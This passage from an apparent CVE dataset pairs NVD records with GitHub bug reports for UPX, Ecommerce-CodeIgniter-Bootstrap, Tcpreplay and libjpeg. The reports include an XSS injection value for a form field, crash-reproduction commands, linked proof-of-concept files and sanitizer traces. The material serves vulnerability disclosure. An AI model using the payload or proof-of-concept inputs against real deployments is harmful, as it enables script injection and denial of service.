char**) /home/upx_cp_2/src/work.cpp:271 #8 0x468b28 in main /home/upx_cp_2/src/main.cpp:1539 #9 0x7fcdf96d582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x4030f8 in _start (/home/upx_cp_2/src/upx.out+0x4030f8) AddressSanitizer can not describe address in more detail (wild memory access suspected). SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x0c607fffbdf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c607fffbe40: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa 0x0c607fffbe50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fffbe90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==104331==ABORTING
heap-buffer-overflow in PackLinuxElf64::canPack() at p_lx_elf.cpp:2385
https://api.github.com/repos/upx/upx/issues/332/comments
2
2020-01-13T08:10:55Z
2022-08-18T22:37:18Z
https://github.com/upx/upx/issues/332
548,768,610
332
4,001
CVE-2022-35213
2022-08-18T20:15:11.573
Ecommerce-CodeIgniter-Bootstrap before commit 56465f was discovered to contain a cross-site scripting (XSS) vulnerability via the function base_url() at /blog/blogpublish.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/commit/56465fb6a83aaa934a76615a8579100938b790a1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/219" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/commit/56465fb6a83aaa934a76615a8579100938b790a1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/219" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ecommerce-codeigniter-bootstrap_project:ecommerce-codeigniter-bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "A2060B33-D99A-4D99-8D54-6AB28E1EE59A", "versionEndExcluding": "2021-08-21", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/219
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kirilkirkov", "Ecommerce-CodeIgniter-Bootstrap" ]
We found multiple XSS vulnerabilities in the latest version of Ecommerce-CodeIgniter-Bootstrap. Technique details: The vulnerabilities occur at base_url() function. We notice the user inputs (e.g., $_POST) are used as the parameter of base_url() function in many places (e.g., the 45th line in /application/modules/admin/views/blog/blogpublish.php), the program echo the return value of this function directly without proper sanitization. This would lead to XSS vulnerabilities. Example: We exploit the echo function in /application/modules/admin/views/blog/blogpublish.php#45 line. The attacker can set $_POST['img'] to 'q" onerror="javascript:alert(1)'. Then the img tag becomes Then he successfully performs a XSS attack. <img width="1416" alt="Ecommerce-xss" src="https://user-images.githubusercontent.com/70422882/130352890-63be80e1-3320-4e52-bc7a-b5fc34b49f12.png"> The vulnerability has been fixed in [56465f](https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/commit/56465fb6a83aaa934a76615a8579100938b790a1) after we reported it to developers.
XSS vulnerabilities
https://api.github.com/repos/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/219/comments
0
2021-08-22T11:13:03Z
2021-08-23T18:27:29Z
https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/219
976,349,920
219
4,002
CVE-2022-37047
2022-08-18T20:15:11.837
The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/734" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/734" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/appneta/tcpreplay/issues/734
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tcpreplay-users/) or [on Stack Overflow with [tcpreplay] tag](http://stackoverflow.com/questions/tagged/tcpreplay). General help is available [here](http://tcpreplay.appneta.com/). If you have a build issue, consider downloading the [latest release](https://github.com/appneta/tcpreplay/releases/latest) Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! **Describe the bug** There is a heap-overflow bug in get_ipv6_next. Different from #718 (The crash point is in line 679, `*((int*)((u_char *)exthdr + len))`), this bug is triggered in line 713 (`*((int*)((u_char *)exthdr + len)) > maxlen`). **To Reproduce** Steps to reproduce the behavior: 1. export CC=clang && export CFLAGS="-fsanitize=address -g" 2. ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 3. ./src/tcprewrite -o /dev/null -i POC **Expected behavior** A clear and concise description of what you expected to happen. The program does not crash. **Screenshots** <img width="623" alt="Screen Shot 2022-07-24 at 10 37 33" src="https://user-images.githubusercontent.com/70422882/180629803-80760126-78ce-432e-8fab-351bdc3b756e.png"> **System (please complete the following information):** - OS: Debian - OS version: buster - Tcpreplay Version: 09f07748 **Additional context** **POC** [poc.zip](https://github.com/appneta/tcpreplay/files/9175011/poc.zip)
[Bug] heap-overflow in get.c:713
https://api.github.com/repos/appneta/tcpreplay/issues/734/comments
1
2022-07-24T02:43:39Z
2022-08-07T02:02:04Z
https://github.com/appneta/tcpreplay/issues/734
1,315,792,459
734
4,003
CVE-2022-37048
2022-08-18T20:15:11.880
The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/735" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/appneta/tcpreplay/issues/735
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tcpreplay-users/) or [on Stack Overflow with [tcpreplay] tag](http://stackoverflow.com/questions/tagged/tcpreplay). General help is available [here](http://tcpreplay.appneta.com/). If you have a build issue, consider downloading the [latest release](https://github.com/appneta/tcpreplay/releases/latest) Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! **Describe the bug** A clear and concise description of what the bug is. There is a heap-overflow bug in get_ipv6_next. Different from #716 (The crash point is in line 322, `ntohs(eth_hdr->ether_type);`), this bug is triggered in line 344 (`pktdata[l2_net_off] >> 4`). **To Reproduce** Steps to reproduce the behavior: 1. export CC=clang && export CFLAGS="-fsanitize=address -g" 2. ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 3. tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null **Expected behavior** A clear and concise description of what you expected to happen. The program does not crash. **Screenshots** If applicable, add screenshots to help explain your problem. <img width="686" alt="Screen Shot 2022-07-24 at 15 32 38" src="https://user-images.githubusercontent.com/70422882/180637125-e59c7e8e-3094-46f7-8331-af1222bc514a.png"> **System (please complete the following information):** - OS: Debian - OS version: buster - Tcpreplay Version: 09f07748 **Additional context** Add any other context about the problem here. **POC** [poc.zip](https://github.com/appneta/tcpreplay/files/9175320/poc.zip)
[Bug] heap-overflow in get.c:344
https://api.github.com/repos/appneta/tcpreplay/issues/735/comments
1
2022-07-24T07:35:35Z
2022-08-07T02:55:11Z
https://github.com/appneta/tcpreplay/issues/735
1,315,833,757
735
4,004
CVE-2022-37049
2022-08-18T20:15:11.927
The component tcpprep in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in parse_mpls at common/get.c:150. NOTE: this is different from CVE-2022-27942.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/736" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/736" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5B75AFRJUGOYHCFG2ZV2JKSUPA6MSCT5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ECRCFJ6X3IVB7BT4KS6AHQMSL532YXYD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWRZO7BG6DHA5NAC3COB45WFXLYRIERC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-08" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/appneta/tcpreplay/issues/736
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
You are opening a _bug report_ against the Tcpreplay project: we use GitHub Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay-users mailing list](https://sourceforge.net/p/tcpreplay/mailman/tcpreplay-users/) or [on Stack Overflow with [tcpreplay] tag](http://stackoverflow.com/questions/tagged/tcpreplay). General help is available [here](http://tcpreplay.appneta.com/). If you have a build issue, consider downloading the [latest release](https://github.com/appneta/tcpreplay/releases/latest) Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! **Describe the bug** A clear and concise description of what the bug is. There is a heap-overflow bug in get.c:150. This bug is different from #719 that crashes in get.c:118. **To Reproduce** Steps to reproduce the behavior: 1. export CC=clang && export CFLAGS="-fsanitize=address -g" 2. ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 3. ./src/tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null **Expected behavior** A clear and concise description of what you expected to happen. The program does not crash. **Screenshots** If applicable, add screenshots to help explain your problem. <img width="683" alt="Screen Shot 2022-07-24 at 22 39 00" src="https://user-images.githubusercontent.com/70422882/180652127-8d4681df-406d-4ab6-9881-09ba2bc03bb9.png"> **System (please complete the following information):** - OS: Debian - OS version: buster - Tcpreplay Version: 09f07748 **Additional context** Add any other context about the problem here. **POC** [poc.zip](https://github.com/appneta/tcpreplay/files/9175989/poc.zip)
[Bug] heap-overflow in get.c:150
https://api.github.com/repos/appneta/tcpreplay/issues/736/comments
1
2022-07-24T14:40:26Z
2022-08-07T03:03:15Z
https://github.com/appneta/tcpreplay/issues/736
1,315,924,974
736
4,005
CVE-2022-37768
2022-08-18T20:15:11.970
libjpeg commit 281daa9 was discovered to contain an infinite loop via the component Frame::ParseTrailer.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/77" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/77" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E4B6B8-F045-4BF3-AC73-8F5596EA703C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/thorfdbg/libjpeg/issues/77
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
version: latest commit 14bf94c poc: [poc.zip](https://github.com/thorfdbg/libjpeg/files/9191143/poc.zip) command: ./jpeg poc /dev/null The backtrace in gdb: ``` (gdb) bt #0 ByteStream::Get (this=0x790ae0) at bytestream.cpp:223 #1 0x000000000042331e in IOStream::PeekWord (this=0x790ae0) at iostream.cpp:543 #2 0x00000000004c38d5 in Frame::ParseTrailer (this=0x792590, io=0x790ae0) at frame.cpp:1018 #3 0x000000000043aac9 in JPEG::ReadInternal (this=0x7904c8, tags=0x7fffffffdd50) at jpeg.cpp:332 #4 0x000000000043988b in JPEG::Read (this=0x7904c8, tags=0x7fffffffdd50) at jpeg.cpp:210 #5 0x000000000041cabb in Reconstruct (infile=<optimized out>, outfile=0x7fffffffe70c "/dev/null", colortrafo=1, alpha=0x0, upsample=true) at reconstruct.cpp:121 #6 0x0000000000408b6a in main (argc=<optimized out>, argv=0x790f29) at main.cpp:747 ``` **Root cause:** There is a loop in frame.cpp:1017-1118. In line 1018, the program continuously reads `marker` in the stream by calling `IOStream::PeekWord()` function. https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/marker/frame.cpp#L1018 In cases of the `default` branch, the loop won't exit. https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/marker/frame.cpp#L1088-L1117 The problem is that the `IOStream::PeekWord()` function might always return a same value. Specifically, the `IOStream::PeekWord()` calls `ByteStream::Get()`. https://github.com/thorfdbg/libjpeg/blob/91985dc031428f8a7cf90af5e22e234f1f529611/io/bytestream.cpp#L214-L224 `IOStream::PeekWord()` returns at line 223 with `m_pucBufPtr++`. However, when using gdb to check the value of `m_pucBufPtr`, I found that the ByteStream::Get() functions repeatedly read the values from the same address. The 0x790f2a and 0x790f29 correspond to `byte1` and `byte2` in `IOStream::PeekWord()` and they never change. <img width="567" alt="Screen Shot 2022-07-26 at 23 54 05" src="https://user-images.githubusercontent.com/70422882/181052728-ee1cbd37-184d-4c75-9dce-6c7cbca25092.png"> `IOStream::PeekWord()` then always returns a same value (calculated by `byte1` and `byte2`). Finally, the program never terminates because the return value forces the program to take the `default` branch.
Infinite loop in Frame::ParseTrailer
https://api.github.com/repos/thorfdbg/libjpeg/issues/77/comments
1
2022-07-26T15:59:16Z
2022-08-03T12:22:36Z
https://github.com/thorfdbg/libjpeg/issues/77
1,318,449,876
77
4,006
CVE-2022-37769
2022-08-18T20:15:12.013
libjpeg commit 281daa9 was discovered to contain a segmentation fault via HuffmanDecoder::Get at huffmandecoder.hpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/78" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/78" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E4B6B8-F045-4BF3-AC73-8F5596EA703C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/thorfdbg/libjpeg/issues/78
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
